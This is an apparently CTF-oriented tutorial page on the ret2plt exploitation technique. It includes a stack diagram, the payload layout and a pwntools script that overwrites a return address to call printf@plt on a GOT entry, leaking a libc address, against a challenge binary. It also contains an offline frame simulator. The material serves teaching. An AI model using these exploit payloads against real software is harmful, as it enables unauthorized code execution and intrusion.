# Ret2plt

A **ret2plt** (**return-to-PLT**) attack is a type of exploitation technique that allows an attacker to execute arbitrary code by **redirecting the flow of execution to a function in the Procedure Linkage Table** ([PLT](/pwn/general-knowledge/plt-and-got.md)).

## How does it work?

In a **ret2plt** attack, the attacker **overwrites the return address** of a function (using a [buffer overflow](/pwn/stack-exploitation/stack-buffer-overflow/basics.md) or a [format string exploit](/pwn/stack-exploitation/format-string/data-leak.md), for example) **with the address of a function in the PLT**. When the function returns, the program jumps to the function in the PLT instead of to the next instruction in the original code.

{% hint style="warning" %}
The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.
{% endhint %}

```
  address   |   values
------------+-------------------------------------------------------------------
            |   +------------------------- Buffer ---------------------------+
0xffffd264: |   |   0x41414141    0x41414141    0x41414141      0x41414141   |
            |   +------------------------------------------------------------+
            |     +- plt addr -+ +-saved eip -+ +--- param --+               |
0xffffd274: |     | 0x565561dd | | 0xffffd35c | | 0xffffd12c |  0x00000001   |
            |     +------------+ +------------+ +------------+               |
  ...       |    ...
```

To put the stack in this state, the payload must have the following layout:

```
[padding up to the saved return address][PLT function address][any 4 bytes][parameter]
```

```python
from pwn import *

elf = ELF('./chall')

# Number of bytes needed to reach the saved return address. The value is an
# assumption for this example; find it for the target binary with a cyclic
# pattern or a debugger.
padding = 64

payload = flat(
    b'A' * padding,         # fill the buffer up to the saved EIP
    elf.plt['printf'],      # overwritten return address: printf@plt
    elf.symbols['main'],    # "saved eip" slot: where printf() returns afterwards
    elf.got['printf']       # first argument: address of printf's GOT entry
)
```

{% hint style="info" %}
In this example, the exploit calls `printf()` with the address of the `printf()` GOT entry as its parameter, and the execution flow then returns to `main`.
{% endhint %}
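The following is an added illustration, not code from the original page: it rebuilds the frame from the diagram above with constructed values (the addresses shown in the diagram, a padding of 16 bytes) and replays what `ret` does on x86, so the reader can see why the "any 4 bytes" slot ends up as the PLT function's return address and the next word as its first cdecl argument, without running any binary.

```python
import struct

# Constructed values copied from the stack diagram above; not from a real binary.
PADDING = 16                 # four 0x41414141 words fill the buffer up to the saved EIP slot
PLT_ADDR = 0x565561dd        # PLT stub the saved return address is overwritten with
FAKE_RET = 0xffffd35c        # "saved eip": where the PLT function will return afterwards
PARAM = 0xffffd12c           # first cdecl argument (the GOT slot in the page's example)

def build_frame(padding, plt_addr, ret_addr, *args):
    """[padding][plt address][return address][arg1][arg2]... as 32-bit little-endian words."""
    words = (plt_addr, ret_addr) + args
    return b"A" * padding + struct.pack("<%dI" % len(words), *words)

def simulate_ret(frame, padding, nargs=1):
    """Replay what the CPU does when the overflowed function executes `ret`.

    Before `ret`, ESP points at the overwritten saved-EIP slot, i.e. offset `padding`
    in the frame. `ret` pops that word into EIP and moves ESP up by 4. The PLT stub
    then runs with the usual cdecl view: [ESP] is its return address, [ESP+4] its
    first argument. Returns a dict describing that view so the layout can be checked
    offline.
    """
    esp = padding
    eip = struct.unpack_from("<I", frame, esp)[0]        # `ret` pops the PLT address
    esp += 4                                             # ESP now points at the fake return slot
    ret_addr = struct.unpack_from("<I", frame, esp)[0]   # what the PLT function will return to
    args = [struct.unpack_from("<I", frame, esp + 4 * (i + 1))[0] for i in range(nargs)]
    return {"eip": eip, "ret_addr": ret_addr, "args": args}

if __name__ == "__main__":
    frame = build_frame(PADDING, PLT_ADDR, FAKE_RET, PARAM)
    print(simulate_ret(frame, PADDING))
```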

